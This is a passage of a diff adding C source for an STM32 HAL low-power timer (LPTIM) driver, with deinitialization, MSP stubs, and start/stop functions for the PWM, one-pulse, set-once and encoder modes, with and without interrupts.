LPTIM peripheral. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_DeInit(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the LPTIM handle allocation */ + if (hlptim == NULL) + { + return HAL_ERROR; + } + + /* Change the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the LPTIM Peripheral Clock */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) + if (hlptim->MspDeInitCallback == NULL) + { + hlptim->MspDeInitCallback = HAL_LPTIM_MspDeInit; + } + + /* DeInit the low level hardware: CLOCK, NVIC.*/ + hlptim->MspDeInitCallback(hlptim); +#else + /* DeInit the low level hardware: CLOCK, NVIC.*/ + HAL_LPTIM_MspDeInit(hlptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + + /* Change the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hlptim); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initialize the LPTIM MSP. + * @param hlptim LPTIM handle + * @retval None + */ +__weak void HAL_LPTIM_MspInit(LPTIM_HandleTypeDef *hlptim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hlptim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LPTIM_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitialize LPTIM MSP. + * @param hlptim LPTIM handle + * @retval None + */ +__weak void HAL_LPTIM_MspDeInit(LPTIM_HandleTypeDef *hlptim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hlptim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LPTIM_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup LPTIM_Exported_Functions_Group2 LPTIM Start-Stop operation functions + * @brief Start-Stop operation functions. + * +@verbatim + ============================================================================== + ##### LPTIM Start Stop operation functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Start the PWM mode. + (+) Stop the PWM mode. + (+) Start the One pulse mode. + (+) Stop the One pulse mode. + (+) Start the Set once mode. + (+) Stop the Set once mode. + (+) Start the Encoder mode. + (+) Stop the Encoder mode. + (+) Start the Timeout mode. + (+) Stop the Timeout mode. + (+) Start the Counter mode. + (+) Stop the Counter mode. + + +@endverbatim + * @{ + */ + +/** + * @brief Start the LPTIM PWM generation. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @param Pulse Specifies the compare value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_PWM_Start(LPTIM_HandleTypeDef *hlptim, uint32_t Period, uint32_t Pulse) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(IS_LPTIM_PULSE(Pulse)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Reset WAVE bit to set PWM mode */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_WAVE; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + + /* Load the pulse value in the compare register */ + __HAL_LPTIM_COMPARE_SET(hlptim, Pulse); + + /* Wait for the completion of the write operation to the LPTIM_CMP register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_CMPOK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Start timer in continuous mode */ + __HAL_LPTIM_START_CONTINUOUS(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the LPTIM PWM generation. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_PWM_Stop(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Change the LPTIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the LPTIM PWM generation in interrupt mode. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF + * @param Pulse Specifies the compare value. + * This parameter must be a value between 0x0000 and 0xFFFF + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_PWM_Start_IT(LPTIM_HandleTypeDef *hlptim, uint32_t Period, uint32_t Pulse) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(IS_LPTIM_PULSE(Pulse)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Reset WAVE bit to set PWM mode */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_WAVE; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + + /* Load the pulse value in the compare register */ + __HAL_LPTIM_COMPARE_SET(hlptim, Pulse); + + /* Wait for the completion of the write operation to the LPTIM_CMP register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_CMPOK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Enable Autoreload write complete interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_ARROK); + + /* Enable Compare write complete interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_CMPOK); + + /* Enable Autoreload match interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_ARRM); + + /* Enable Compare match interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_CMPM); + + /* If external trigger source is used, then enable external trigger interrupt */ + if ((hlptim->Init.Trigger.Source) != LPTIM_TRIGSOURCE_SOFTWARE) + { + /* Enable external trigger interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_EXTTRIG); + } + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Start timer in continuous mode */ + __HAL_LPTIM_START_CONTINUOUS(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the LPTIM PWM generation in interrupt mode. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_PWM_Stop_IT(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable Autoreload write complete interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_ARROK); + + /* Disable Compare write complete interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_CMPOK); + + /* Disable Autoreload match interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_ARRM); + + /* Disable Compare match interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_CMPM); + + /* If external trigger source is used, then disable external trigger interrupt */ + if ((hlptim->Init.Trigger.Source) != LPTIM_TRIGSOURCE_SOFTWARE) + { + /* Disable external trigger interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_EXTTRIG); + } + + /* Change the LPTIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the LPTIM One pulse generation. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @param Pulse Specifies the compare value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_OnePulse_Start(LPTIM_HandleTypeDef *hlptim, uint32_t Period, uint32_t Pulse) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(IS_LPTIM_PULSE(Pulse)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Reset WAVE bit to set one pulse mode */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_WAVE; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + + /* Load the pulse value in the compare register */ + __HAL_LPTIM_COMPARE_SET(hlptim, Pulse); + + /* Wait for the completion of the write operation to the LPTIM_CMP register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_CMPOK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Start timer in single (one shot) mode */ + __HAL_LPTIM_START_SINGLE(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the LPTIM One pulse generation. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_OnePulse_Stop(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Change the LPTIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the LPTIM One pulse generation in interrupt mode. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @param Pulse Specifies the compare value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_OnePulse_Start_IT(LPTIM_HandleTypeDef *hlptim, uint32_t Period, uint32_t Pulse) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(IS_LPTIM_PULSE(Pulse)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Reset WAVE bit to set one pulse mode */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_WAVE; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + + /* Load the pulse value in the compare register */ + __HAL_LPTIM_COMPARE_SET(hlptim, Pulse); + + /* Wait for the completion of the write operation to the LPTIM_CMP register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_CMPOK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Enable Autoreload write complete interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_ARROK); + + /* Enable Compare write complete interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_CMPOK); + + /* Enable Autoreload match interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_ARRM); + + /* Enable Compare match interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_CMPM); + + /* If external trigger source is used, then enable external trigger interrupt */ + if ((hlptim->Init.Trigger.Source) != LPTIM_TRIGSOURCE_SOFTWARE) + { + /* Enable external trigger interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_EXTTRIG); + } + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Start timer in single (one shot) mode */ + __HAL_LPTIM_START_SINGLE(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the LPTIM One pulse generation in interrupt mode. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_OnePulse_Stop_IT(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable Autoreload write complete interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_ARROK); + + /* Disable Compare write complete interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_CMPOK); + + /* Disable Autoreload match interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_ARRM); + + /* Disable Compare match interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_CMPM); + + /* If external trigger source is used, then disable external trigger interrupt */ + if ((hlptim->Init.Trigger.Source) != LPTIM_TRIGSOURCE_SOFTWARE) + { + /* Disable external trigger interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_EXTTRIG); + } + + /* Change the LPTIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the LPTIM in Set once mode. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @param Pulse Specifies the compare value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_SetOnce_Start(LPTIM_HandleTypeDef *hlptim, uint32_t Period, uint32_t Pulse) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(IS_LPTIM_PULSE(Pulse)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Set WAVE bit to enable the set once mode */ + hlptim->Instance->CFGR |= LPTIM_CFGR_WAVE; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + + /* Load the pulse value in the compare register */ + __HAL_LPTIM_COMPARE_SET(hlptim, Pulse); + + /* Wait for the completion of the write operation to the LPTIM_CMP register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_CMPOK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Start timer in single (one shot) mode */ + __HAL_LPTIM_START_SINGLE(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the LPTIM Set once mode. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_SetOnce_Stop(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Change the LPTIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the LPTIM Set once mode in interrupt mode. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @param Pulse Specifies the compare value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_SetOnce_Start_IT(LPTIM_HandleTypeDef *hlptim, uint32_t Period, uint32_t Pulse) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(IS_LPTIM_PULSE(Pulse)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Set WAVE bit to enable the set once mode */ + hlptim->Instance->CFGR |= LPTIM_CFGR_WAVE; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + + /* Load the pulse value in the compare register */ + __HAL_LPTIM_COMPARE_SET(hlptim, Pulse); + + /* Wait for the completion of the write operation to the LPTIM_CMP register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_CMPOK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Enable Autoreload write complete interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_ARROK); + + /* Enable Compare write complete interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_CMPOK); + + /* Enable Autoreload match interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_ARRM); + + /* Enable Compare match interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_CMPM); + + /* If external trigger source is used, then enable external trigger interrupt */ + if ((hlptim->Init.Trigger.Source) != LPTIM_TRIGSOURCE_SOFTWARE) + { + /* Enable external trigger interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_EXTTRIG); + } + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Start timer in single (one shot) mode */ + __HAL_LPTIM_START_SINGLE(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the LPTIM Set once mode in interrupt mode. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_SetOnce_Stop_IT(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable Autoreload write complete interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_ARROK); + + /* Disable Compare write complete interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_CMPOK); + + /* Disable Autoreload match interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_ARRM); + + /* Disable Compare match interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_CMPM); + + /* If external trigger source is used, then disable external trigger interrupt */ + if ((hlptim->Init.Trigger.Source) != LPTIM_TRIGSOURCE_SOFTWARE) + { + /* Disable external trigger interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_EXTTRIG); + } + + /* Change the LPTIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the Encoder interface. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_Encoder_Start(LPTIM_HandleTypeDef *hlptim, uint32_t Period) +{ + uint32_t tmpcfgr; + + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(hlptim->Init.Clock.Source == LPTIM_CLOCKSOURCE_APBCLOCK_LPOSC); + assert_param(hlptim->Init.Clock.Prescaler == LPTIM_PRESCALER_DIV1); + assert_param(IS_LPTIM_CLOCK_POLARITY(hlptim->Init.UltraLowPowerClock.Polarity)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Get the LPTIMx CFGR value */ + tmpcfgr = hlptim->Instance->CFGR; + + /* Clear CKPOL bits */ + tmpcfgr &= (uint32_t)(~LPTIM_CFGR_CKPOL); + + /* Set Input polarity */ + tmpcfgr |= hlptim->Init.UltraLowPowerClock.Polarity; + + /* Write to LPTIMx CFGR */ + hlptim->Instance->CFGR = tmpcfgr; + + /* Set ENC bit to enable the encoder interface */ + hlptim->Instance->CFGR |= LPTIM_CFGR_ENC; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Start timer in continuous mode */ + __HAL_LPTIM_START_CONTINUOUS(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the Encoder interface. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_Encoder_Stop(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Reset ENC bit to disable the encoder interface */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_ENC; + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the Encoder interface in interrupt mode. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_Encoder_Start_IT(LPTIM_HandleTypeDef *hlptim, uint32_t Period) +{ + uint32_t tmpcfgr; + + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(hlptim->Init.Clock.Source == LPTIM_CLOCKSOURCE_APBCLOCK_LPOSC); + assert_param(hlptim->Init.Clock.Prescaler == LPTIM_PRESCALER_DIV1); + assert_param(IS_LPTIM_CLOCK_POLARITY(hlptim->Init.UltraLowPowerClock.Polarity)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Configure edge sensitivity for encoder mode */ + /* Get the LPTIMx CFGR value */ + tmpcfgr = hlptim->Instance->CFGR; + + /* Clear CKPOL bits */ + tmpcfgr &= (uint32_t)(~LPTIM_CFGR_CKPOL); + + /* Set Input polarity */ + tmpcfgr |= hlptim->Init.UltraLowPowerClock.Polarity; + + /* Write to LPTIMx CFGR */ + hlptim->Instance->CFGR = tmpcfgr; + + /* Set ENC bit to enable the encoder interface */ + hlptim->Instance->CFGR |= LPTIM_CFGR_ENC; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Enable "switch to down direction" interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_DOWN); + + /* Enable "switch to up direction" interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_UP); + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Start timer in continuous mode */ + __HAL_LPTIM_START_CONTINUOUS(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the Encoder interface in interrupt mode. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_Encoder_Stop_IT(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Reset ENC bit to disable the encoder interface */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_ENC; + + /* Disable "switch to down direction" interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_DOWN); + + /* Disable "switch to up direction" interrupt */ + 